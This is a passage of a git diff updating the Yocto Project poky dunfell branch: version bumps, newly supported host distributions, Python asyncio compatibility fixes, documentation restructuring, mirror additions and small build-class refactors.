--- a/poky/bitbake/lib/hashserv/server.py +++ b/poky/bitbake/lib/hashserv/server.py @@ -12,6 +12,7 @@ import math import os import signal import socket +import sys import time from . import chunkify, DEFAULT_MAX_CHUNK @@ -419,9 +420,14 @@ class Server(object): self._cleanup_socket = None def start_tcp_server(self, host, port): - self.server = self.loop.run_until_complete( - asyncio.start_server(self.handle_client, host, port, loop=self.loop) - ) + if sys.version_info[0] == 3 and sys.version_info[1] < 6: + self.server = self.loop.run_until_complete( + asyncio.start_server(self.handle_client, host, port, loop=self.loop) + ) + else: + self.server = self.loop.run_until_complete( + asyncio.start_server(self.handle_client, host, port) + ) for s in self.server.sockets: logger.info('Listening on %r' % (s.getsockname(),)) @@ -444,9 +450,14 @@ class Server(object): try: # Work around path length limits in AF_UNIX os.chdir(os.path.dirname(path)) - self.server = self.loop.run_until_complete( - asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) - ) + if sys.version_info[0] == 3 and sys.version_info[1] < 6: + self.server = self.loop.run_until_complete( + asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) + ) + else: + self.server = self.loop.run_until_complete( + asyncio.start_unix_server(self.handle_client, os.path.basename(path)) + ) finally: os.chdir(cwd) diff --git a/poky/bitbake/lib/layerindexlib/__init__.py b/poky/bitbake/lib/layerindexlib/__init__.py index 77196b408f..f30ee9e259 100644 --- a/poky/bitbake/lib/layerindexlib/__init__.py +++ b/poky/bitbake/lib/layerindexlib/__init__.py @@ -6,7 +6,6 @@ import datetime import logging -import imp from collections import OrderedDict from layerindexlib.plugin import LayerIndexPluginUrlError diff --git a/poky/documentation/conf.py b/poky/documentation/conf.py index 82fa325545..0d61afc9da 100644 --- a/poky/documentation/conf.py +++ b/poky/documentation/conf.py @@ -16,7 +16,8 @@ import os import sys import datetime -current_version = "3.1.10" +current_version = "3.1.13" +bitbake_version = "1.46" # String used in sidebar version = 'Version: ' + current_version @@ -82,7 +83,7 @@ extlinks = { # Intersphinx config to use cross reference with Bitbake user manual intersphinx_mapping = { - 'bitbake': ('https://docs.yoctoproject.org/bitbake/1.46', None) + 'bitbake': ('https://docs.yoctoproject.org/bitbake/' + bitbake_version, None) } # -- Options for HTML output ------------------------------------------------- diff --git a/poky/documentation/poky.yaml b/poky/documentation/poky.yaml index 590af46ebd..8da5f5915d 100644 --- a/poky/documentation/poky.yaml +++ b/poky/documentation/poky.yaml @@ -1,11 +1,11 @@ -DISTRO : "3.1.10" +DISTRO : "3.1.13" DISTRO_NAME_NO_CAP : "dunfell" DISTRO_NAME : "Dunfell" DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus" -YOCTO_DOC_VERSION : "3.1.10" -YOCTO_DOC_VERSION_MINUS_ONE : "3.0.2" -DISTRO_REL_TAG : "yocto-3.1.10" -POKYVERSION : "23.0.10" +YOCTO_DOC_VERSION : "3.1.13" +YOCTO_DOC_VERSION_MINUS_ONE : "3.0.4" +DISTRO_REL_TAG : "yocto-3.1.13" +POKYVERSION : "23.0.13" YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;" YOCTO_DL_URL : "https://downloads.yoctoproject.org" YOCTO_AB_URL : "https://autobuilder.yoctoproject.org" @@ -18,7 +18,8 @@ FEDORA_HOST_PACKAGES_ESSENTIAL : "gawk make wget tar bzip2 gzip python3 unzip pe diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \ ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \ python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \ - python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel" + python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel perl-FindBin perl-File-Compare \ + perl-File-Copy perl-locale" OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \ diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \ python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel diff --git a/poky/documentation/ref-manual/migration-3.0.rst b/poky/documentation/ref-manual/migration-3.0.rst index 047b75526f..50f7d697b0 100644 --- a/poky/documentation/ref-manual/migration-3.0.rst +++ b/poky/documentation/ref-manual/migration-3.0.rst @@ -184,8 +184,7 @@ The following BitBake changes have occurred. exceptions. Remove this argument in any calls to ``bb.build.exec_func()`` in custom classes or scripts. -- The - :term:`bitbake:BB_SETSCENE_VERIFY_FUNCTION2` +- The ``BB_SETSCENE_VERIFY_FUNCTION2`` variable is no longer used. In the unlikely event that you have any references to it, they should be removed. diff --git a/poky/documentation/ref-manual/ref-system-requirements.rst b/poky/documentation/ref-manual/ref-system-requirements.rst index d238dc454b..041f64c598 100644 --- a/poky/documentation/ref-manual/ref-system-requirements.rst +++ b/poky/documentation/ref-manual/ref-system-requirements.rst @@ -57,6 +57,8 @@ distributions: - Fedora 33 +- Fedora 34 + - CentOS 7.x - Debian GNU/Linux 8.x (Jessie) @@ -65,6 +67,8 @@ distributions: - Debian GNU/Linux 10.x (Buster) +- Debian GNU/Linux 11.x (Bullseye) + - OpenSUSE Leap 15.1 - OpenSUSE Leap 15.2 diff --git a/poky/documentation/ref-manual/ref-tasks.rst b/poky/documentation/ref-manual/ref-tasks.rst index 4ed15365f3..2f1959a010 100644 --- a/poky/documentation/ref-manual/ref-tasks.rst +++ b/poky/documentation/ref-manual/ref-tasks.rst @@ -331,22 +331,19 @@ file as a patch file: file://file;apply=yes \ " -Conversely, if you have a directory full of patch files and you want to -exclude some so that the ``do_patch`` task does not apply them during -the patch phase, you can use the "apply=no" parameter with the -``SRC_URI`` statement: -:: +Conversely, if you have a file whose file type is ``.patch`` or ``.diff`` +and you want to exclude it so that the ``do_patch`` task does not apply +it during the patch phase, you can use the "apply=no" parameter with the +:term:`SRC_URI` statement:: SRC_URI = " \ git://path_to_repo/some_package \ - file://path_to_lots_of_patch_files \ - file://path_to_lots_of_patch_files/patch_file5;apply=no \ + file://file1.patch \ + file://file2.patch;apply=no \ " -In the -previous example, assuming all the files in the directory holding the -patch files end with either ``.patch`` or ``.diff``, every file would be -applied as a patch by default except for the ``patch_file5`` patch. +In the previous example ``file1.patch`` would be applied as a patch by default +while ``file2.patch`` would not be applied. You can find out more about the patching process in the ":ref:`patching-dev-environment`" section in diff --git a/poky/documentation/releases.rst b/poky/documentation/releases.rst index 78f604e2a1..57e4566e1b 100644 --- a/poky/documentation/releases.rst +++ b/poky/documentation/releases.rst @@ -1,11 +1,28 @@ .. SPDX-License-Identifier: CC-BY-SA-2.0-UK -========================= - Current Release Manuals -========================= +=========================== + Supported Release Manuals +=========================== + +****************************** +Release Series 3.4 (honister) +****************************** + +- :yocto_docs:`3.4 Documentation ` +- :yocto_docs:`3.4.1 Documentation ` + +****************************** +Release Series 3.3 (hardknott) +****************************** + +- :yocto_docs:`3.3 Documentation ` +- :yocto_docs:`3.3.1 Documentation ` +- :yocto_docs:`3.3.2 Documentation ` +- :yocto_docs:`3.3.3 Documentation ` +- :yocto_docs:`3.3.4 Documentation ` **************************** -3.1 'dunfell' Release Series +Release Series 3.1 (dunfell) **************************** - :yocto_docs:`3.1 Documentation ` @@ -19,13 +36,26 @@ - :yocto_docs:`3.1.8 Documentation ` - :yocto_docs:`3.1.9 Documentation ` - :yocto_docs:`3.1.10 Documentation ` +- :yocto_docs:`3.1.11 Documentation ` +- :yocto_docs:`3.1.12 Documentation ` +- :yocto_docs:`3.1.13 Documentation ` ========================== - Previous Release Manuals + Outdated Release Manuals ========================== +******************************* +Release Series 3.2 (gatesgarth) +******************************* + +- :yocto_docs:`3.2 Documentation ` +- :yocto_docs:`3.2.1 Documentation ` +- :yocto_docs:`3.2.2 Documentation ` +- :yocto_docs:`3.2.3 Documentation ` +- :yocto_docs:`3.2.4 Documentation ` + ************************* -3.0 'zeus' Release Series +Release Series 3.0 (zeus) ************************* - :yocto_docs:`3.0 Documentation ` @@ -35,7 +65,7 @@ - :yocto_docs:`3.0.4 Documentation ` **************************** -2.7 'warrior' Release Series +Release Series 2.7 (warrior) **************************** - :yocto_docs:`2.7 Documentation ` @@ -45,7 +75,7 @@ - :yocto_docs:`2.7.4 Documentation ` ************************* -2.6 'thud' Release Series +Release Series 2.6 (thud) ************************* - :yocto_docs:`2.6 Documentation ` @@ -55,16 +85,16 @@ - :yocto_docs:`2.6.4 Documentation ` ************************* -2.5 'sumo' Release Series +Release Series 2.5 (sumo) ************************* - :yocto_docs:`2.5 Documentation ` - :yocto_docs:`2.5.1 Documentation ` - :yocto_docs:`2.5.2 Documentation ` - :yocto_docs:`2.5.3 Documentation ` - + ************************** -2.4 'rocko' Release Series +Release Series 2.4 (rocko) ************************** - :yocto_docs:`2.4 Documentation ` @@ -74,7 +104,7 @@ - :yocto_docs:`2.4.4 Documentation ` ************************* -2.3 'pyro' Release Series +Release Series 2.3 (pyro) ************************* - :yocto_docs:`2.3 Documentation ` @@ -84,7 +114,7 @@ - :yocto_docs:`2.3.4 Documentation ` ************************** -2.2 'morty' Release Series +Release Series 2.2 (morty) ************************** - :yocto_docs:`2.2 Documentation ` @@ -93,7 +123,7 @@ - :yocto_docs:`2.2.3 Documentation ` **************************** -2.1 'krogoth' Release Series +Release Series 2.1 (krogoth) **************************** - :yocto_docs:`2.1 Documentation ` @@ -102,7 +132,7 @@ - :yocto_docs:`2.1.3 Documentation ` *************************** -2.0 'jethro' Release Series +Release Series 2.0 (jethro) *************************** - :yocto_docs:`1.9 Documentation ` @@ -112,7 +142,7 @@ - :yocto_docs:`2.0.3 Documentation ` ************************* -1.8 'fido' Release Series +Release Series 1.8 (fido) ************************* - :yocto_docs:`1.8 Documentation ` @@ -120,7 +150,7 @@ - :yocto_docs:`1.8.2 Documentation ` ************************** -1.7 'dizzy' Release Series +Release Series 1.7 (dizzy) ************************** - :yocto_docs:`1.7 Documentation ` @@ -129,16 +159,16 @@ - :yocto_docs:`1.7.3 Documentation ` ************************** -1.6 'daisy' Release Series +Release Series 1.6 (daisy) ************************** - :yocto_docs:`1.6 Documentation ` - :yocto_docs:`1.6.1 Documentation ` - :yocto_docs:`1.6.2 Documentation ` - :yocto_docs:`1.6.3 Documentation ` - + ************************* -1.5 'dora' Release Series +Release Series 1.5 (dora) ************************* - :yocto_docs:`1.5 Documentation ` @@ -148,7 +178,7 @@ - :yocto_docs:`1.5.4 Documentation ` ************************** -1.4 'dylan' Release Series +Release Series 1.4 (dylan) ************************** - :yocto_docs:`1.4 Documentation ` @@ -157,9 +187,9 @@ - :yocto_docs:`1.4.3 Documentation ` - :yocto_docs:`1.4.4 Documentation ` - :yocto_docs:`1.4.5 Documentation ` - + ************************** -1.3 'danny' Release Series +Release Series 1.3 (danny) ************************** - :yocto_docs:`1.3 Documentation ` @@ -167,7 +197,7 @@ - :yocto_docs:`1.3.2 Documentation ` *************************** -1.2 'denzil' Release Series +Release Series 1.2 (denzil) *************************** - :yocto_docs:`1.2 Documentation ` @@ -175,7 +205,7 @@ - :yocto_docs:`1.2.2 Documentation ` *************************** -1.1 'edison' Release Series +Release Series 1.1 (edison) *************************** - :yocto_docs:`1.1 Documentation ` @@ -183,7 +213,7 @@ - :yocto_docs:`1.1.2 Documentation ` **************************** -1.0 'bernard' Release Series +Release Series 1.0 (bernard) **************************** - :yocto_docs:`1.0 Documentation ` @@ -191,7 +221,7 @@ - :yocto_docs:`1.0.2 Documentation ` **************************** -0.9 'laverne' Release Series +Release Series 0.9 (laverne) **************************** - :yocto_docs:`0.9 Documentation ` diff --git a/poky/documentation/sphinx-static/switchers.js b/poky/documentation/sphinx-static/switchers.js index a6432ae9b0..bda15485c0 100644 --- a/poky/documentation/sphinx-static/switchers.js +++ b/poky/documentation/sphinx-static/switchers.js @@ -2,8 +2,11 @@ 'use strict'; var all_versions = { - 'dev': 'dev (3.3)', - '3.1.10': '3.1.10', + 'dev': 'dev (3.5)', + '3.4.1': '3.4.1', + '3.3.4': '3.3.4', + '3.2.4': '3.2.4', + '3.1.13': '3.1.13', '3.0.4': '3.0.4', '2.7.4': '2.7.4', }; diff --git a/poky/meta-poky/conf/distro/poky.conf b/poky/meta-poky/conf/distro/poky.conf index 11897c7422..7274657037 100644 --- a/poky/meta-poky/conf/distro/poky.conf +++ b/poky/meta-poky/conf/distro/poky.conf @@ -1,6 +1,6 @@ DISTRO = "poky" DISTRO_NAME = "Poky (Yocto Project Reference Distro)" -DISTRO_VERSION = "3.1.10" +DISTRO_VERSION = "3.1.14" DISTRO_CODENAME = "dunfell" SDK_VENDOR = "-pokysdk" SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}" @@ -24,7 +24,7 @@ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} ${POKY_DEFAULT_DISTRO_FEATURES}" PREFERRED_VERSION_linux-yocto ?= "5.4%" SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}" -SDKPATH = "/opt/${DISTRO}/${SDK_VERSION}" +SDKPATHINSTALL = "/opt/${DISTRO}/${SDK_VERSION}" DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}" DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}" @@ -61,11 +61,13 @@ SANITY_TESTED_DISTROS ?= " \ fedora-31 \n \ fedora-32 \n \ fedora-33 \n \ + fedora-34 \n \ centos-7 \n \ centos-8 \n \ debian-8 \n \ debian-9 \n \ debian-10 \n \ + debian-11 \n \ opensuseleap-15.1 \n \ opensuseleap-15.2 \n \ " diff --git a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb index 07b83276fb..8a27e3a791 100644 --- a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb +++ b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb @@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717" PV = "0.1+git${SRCPV}" PR = "r2" -SRC_URI = "git://git.yoctoproject.org/dbus-wait" +SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master" UPSTREAM_CHECK_COMMITS = "1" RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" diff --git a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded index 32ec4b14fa..fbe90d6c6b 100644 --- a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded +++ b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded @@ -10,7 +10,7 @@ DEPENDS = "dbus" SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517" PV = "0.1+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/dbus-wait" +SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master" UPSTREAM_CHECK_COMMITS = "1" RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" diff --git a/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend b/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend index 35147d2da8..cd059c06c4 100644 --- a/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend +++ b/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend @@ -7,8 +7,8 @@ KMACHINE_genericx86 ?= "common-pc" KMACHINE_genericx86-64 ?= "common-pc-64" KMACHINE_beaglebone-yocto ?= "beaglebone" -SRCREV_machine_genericx86 ?= "31db2b47ac7d8508080fbb7344399b501216de66" -SRCREV_machine_genericx86-64 ?= "31db2b47ac7d8508080fbb7344399b501216de66" +SRCREV_machine_genericx86 ?= "76404f1ae59698b6a446dba29c885ca78c69c330" +SRCREV_machine_genericx86-64 ?= "76404f1ae59698b6a446dba29c885ca78c69c330" SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" @@ -17,7 +17,7 @@ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64" COMPATIBLE_MACHINE_edgerouter = "edgerouter" COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto" -LINUX_VERSION_genericx86 = "5.4.94" -LINUX_VERSION_genericx86-64 = "5.4.94" +LINUX_VERSION_genericx86 = "5.4.158" +LINUX_VERSION_genericx86-64 = "5.4.158" LINUX_VERSION_edgerouter = "5.4.58" LINUX_VERSION_beaglebone-yocto = "5.4.58" diff --git a/poky/meta/classes/base.bbclass b/poky/meta/classes/base.bbclass index 8a1b5f79c1..9ed736b0e1 100644 --- a/poky/meta/classes/base.bbclass +++ b/poky/meta/classes/base.bbclass @@ -153,14 +153,14 @@ do_fetch[vardeps] += "SRCREV" python base_do_fetch() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: fetcher = bb.fetch2.Fetch(src_uri, d) fetcher.download() except bb.fetch2.BBFetchException as e: - bb.fatal(str(e)) + bb.fatal("Bitbake Fetcher Error: " + repr(e)) } addtask unpack after do_fetch @@ -170,14 +170,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o python base_do_unpack() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: fetcher = bb.fetch2.Fetch(src_uri, d) fetcher.unpack(d.getVar('WORKDIR')) except bb.fetch2.BBFetchException as e: - bb.fatal(str(e)) + bb.fatal("Bitbake Fetcher Error: " + repr(e)) } def get_layers_branch_rev(d): @@ -688,7 +688,7 @@ python () { if os.path.basename(p) == machine and os.path.isdir(p): paths.append(p) - if len(paths) != 0: + if paths: for s in srcuri.split(): if not s.startswith("file://"): continue @@ -721,7 +721,7 @@ do_cleansstate[nostamp] = "1" python do_cleanall() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: diff --git a/poky/meta/classes/buildhistory.bbclass b/poky/meta/classes/buildhistory.bbclass index 44a66df962..2746996cbb 100644 --- a/poky/meta/classes/buildhistory.bbclass +++ b/poky/meta/classes/buildhistory.bbclass @@ -953,23 +953,19 @@ def write_latest_srcrev(d, pkghistdir): value = value.replace('"', '').strip() old_tag_srcrevs[key] = value with open(srcrevfile, 'w') as f: - orig_srcrev = d.getVar('SRCREV', False) or 'INVALID' - if orig_srcrev != 'INVALID': - f.write('# SRCREV = "%s"\n' % orig_srcrev) - if len(srcrevs) > 1: - for name, srcrev in sorted(srcrevs.items()): - orig_srcrev = d.getVar('SRCREV_%s' % name, False) - if orig_srcrev: - f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev)) - f.write('SRCREV_%s = "%s"\n' % (name, srcrev)) - else: - f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values()))) - if len(tag_srcrevs) > 0: - for name, srcrev in sorted(tag_srcrevs.items()): - f.write('# tag_%s = "%s"\n' % (name, srcrev)) - if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev: - pkg = d.getVar('PN') - bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev)) + for name, srcrev in sorted(srcrevs.items()): + suffix = "_" + name + if name == "default": + suffix = "" + orig_srcrev = d.getVar('SRCREV%s' % suffix, False) + if orig_srcrev: + f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev)) + f.write('SRCREV%s = "%s"\n' % (suffix, srcrev)) + for name, srcrev in sorted(tag_srcrevs.items()): + f.write('# tag_%s = "%s"\n' % (name, srcrev)) + if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev: + pkg = d.getVar('PN') + bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev)) else: if os.path.exists(srcrevfile): diff --git a/poky/meta/classes/cve-check.bbclass b/poky/meta/classes/cve-check.bbclass index b6df2c31da..6eecbdbf13 100644 --- a/poky/meta/classes/cve-check.bbclass +++ b/poky/meta/classes/cve-check.bbclass @@ -110,7 +110,8 @@ python do_cve_check () { } addtask cve_check before do_build after do_fetch -do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db" +do_cve_check[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_cve_check[depends] = "cve-update-db-native:do_fetch" do_cve_check[nostamp] = "1" python cve_check_cleanup () { diff --git a/poky/meta/classes/devtool-source.bbclass b/poky/meta/classes/devtool-source.bbclass index 280d6009f3..41900e651f 100644 --- a/poky/meta/classes/devtool-source.bbclass +++ b/poky/meta/classes/devtool-source.bbclass @@ -199,6 +199,7 @@ python devtool_post_patch() { # Run do_patch function with the override applied localdata = bb.data.createCopy(d) localdata.setVar('OVERRIDES', ':'.join(no_overrides)) + localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides)) bb.build.exec_func('do_patch', localdata) rm_patches() # Now we need to reconcile the dev branch with the no-overrides one @@ -216,7 +217,8 @@ python devtool_post_patch() { # Reset back to the initial commit on a new branch bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir) # Run do_patch function with the override applied - localdata.appendVar('OVERRIDES', ':%s' % override) + localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override])) + localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override])) bb.build.exec_func('do_patch', localdata) rm_patches() # Now we need to reconcile the new branch with the no-overrides one diff --git a/poky/meta/classes/devupstream.bbclass b/poky/meta/classes/devupstream.bbclass index 7780c5482c..97e137cb40 100644 --- a/poky/meta/classes/devupstream.bbclass +++ b/poky/meta/classes/devupstream.bbclass @@ -4,7 +4,7 @@ # # Usage: # BBCLASSEXTEND = "devupstream:target" -# SRC_URI_class-devupstream = "git://git.example.com/example" +# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master" # SRCREV_class-devupstream = "abcdef" # # If the first entry in SRC_URI is a git: URL then S is rewritten to diff --git a/poky/meta/classes/externalsrc.bbclass b/poky/meta/classes/externalsrc.bbclass index c7fcdca6ef..0e0a3ae89c 100644 --- a/poky/meta/classes/externalsrc.bbclass +++ b/poky/meta/classes/externalsrc.bbclass @@ -108,6 +108,15 @@ python () { if local_srcuri and task in fetch_tasks: continue bb.build.deltask(task, d) + if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack': + # The reproducible_build's create_source_date_epoch_stamp function must + # be run after the source is available and before the + # do_deploy_source_date_epoch task. In the normal case, it's attached + # to do_unpack as a postfuncs, but since we removed do_unpack (above) + # we need to move the function elsewhere. The easiest thing to do is + # move it into the prefuncs of the do_deploy_source_date_epoch task. + # This is safe, as externalsrc runs with the source already unpacked. + d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ') d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ") d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ") diff --git a/poky/meta/classes/image_types.bbclass b/poky/meta/classes/image_types.bbclass index ff42ac9423..6dc0e094d0 100644 --- a/poky/meta/classes/image_types.bbclass +++ b/poky/meta/classes/image_types.bbclass @@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO EXTRA_IMAGECMD_ext2 ?= "-i 4096" EXTRA_IMAGECMD_ext3 ?= "-i 4096" EXTRA_IMAGECMD_ext4 ?= "-i 4096" -EXTRA_IMAGECMD_btrfs ?= "-n 4096" +EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink" EXTRA_IMAGECMD_f2fs ?= "" do_image_cpio[depends] += "cpio-native:do_populate_sysroot" diff --git a/poky/meta/classes/libc-package.bbclass b/poky/meta/classes/libc-package.bbclass index de3b4250c7..1143f538d6 100644 --- a/poky/meta/classes/libc-package.bbclass +++ b/poky/meta/classes/libc-package.bbclass @@ -355,7 +355,7 @@ python package_do_split_gconvs () { m.write("\t@echo 'Progress %d/%d'\n" % (i, total)) m.write("\t" + makerecipe + "\n\n") d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile))) - d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)") + d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)") bb.note("Executing binary locale generation makefile") bb.build.exec_func("oe_runmake", d) bb.note("collecting binary locales from locale tree") diff --git a/poky/meta/classes/license.bbclass b/poky/meta/classes/license.bbclass index 73f99e87a8..6b03221c7f 100644 --- a/poky/meta/classes/license.bbclass +++ b/poky/meta/classes/license.bbclass @@ -153,6 +153,10 @@ def find_license_files(d): find_license(node.s.replace("+", "").replace("*", "")) self.generic_visit(node) + def visit_Constant(self, node): + find_license(node.value.replace("+", "").replace("*", "")) + self.generic_visit(node) + def find_license(license_type): try: bb.utils.mkdirhier(gen_lic_dest) diff --git a/poky/meta/classes/mirrors.bbclass b/poky/meta/classes/mirrors.bbclass index 87bba41472..a36236df9f 100644 --- a/poky/meta/classes/mirrors.bbclass +++ b/poky/meta/classes/mirrors.bbclass @@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \ ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \ ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \ ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \ -http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \ http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \ ${APACHE_MIRROR} http://www.us.apache.org/dist \n \ @@ -62,6 +61,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \ npm://.*/?.* http://sources.openembedded.org/ \n \ ${CPAN_MIRROR} http://cpan.metacpan.org/ \n \ ${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \ +https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \ +https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \ " # Use MIRRORS to provide git repo fallbacks using the https protocol, for cases diff --git a/poky/meta/classes/package.bbclass b/poky/meta/classes/package.bbclass index 3ff74c9f31..702427fecc 100644 --- a/poky/meta/classes/package.bbclass +++ b/poky/meta/classes/package.bbclass @@ -1989,12 +1989,12 @@ python package_do_pkgconfig () { for pkg in packages.split(): pkgconfig_provided[pkg] = [] pkgconfig_needed[pkg] = [] - for file in pkgfiles[pkg]: + for file in sorted(pkgfiles[pkg]): m = pc_re.match(file) if m: pd = bb.data.init() name = m.group(1) - pkgconfig_provided[pkg].append(name) + pkgconfig_provided[pkg].append(os.path.basename(name)) if not os.access(file, os.R_OK): continue with open(file, 'r') as f: @@ -2017,7 +2017,7 @@ python package_do_pkgconfig () { pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist") if pkgconfig_provided[pkg] != []: with open(pkgs_file, 'w') as f: - for p in pkgconfig_provided[pkg]: + for p in sorted(pkgconfig_provided[pkg]): f.write('%s\n' % p) # Go from least to most specific since the last one found wins diff --git a/poky/meta/classes/package_deb.bbclass b/poky/meta/classes/package_deb.bbclass index 790b26aef2..fa8c6c82ff 100644 --- a/poky/meta/classes/package_deb.bbclass +++ b/poky/meta/classes/package_deb.bbclass @@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}" do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}" do_package_write_deb[umask] = "022" do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_deb after do_packagedata do_package - +EPOCHTASK ??= "" +addtask package_write_deb after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot" PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot" diff --git a/poky/meta/classes/package_ipk.bbclass b/poky/meta/classes/package_ipk.bbclass index c008559e4a..4927cfba00 100644 --- a/poky/meta/classes/package_ipk.bbclass +++ b/poky/meta/classes/package_ipk.bbclass @@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}" do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}" do_package_write_ipk[umask] = "022" do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" -addtask package_write_ipk after do_packagedata do_package +EPOCHTASK ??= "" +addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK} PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot" PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot" diff --git a/poky/meta/classes/package_rpm.bbclass b/poky/meta/classes/package_rpm.bbclass index fc9007922a..65587d228b 100644 --- a/poky/meta/classes/package_rpm.bbclass +++ b/poky/meta/classes/package_rpm.bbclass @@ -743,7 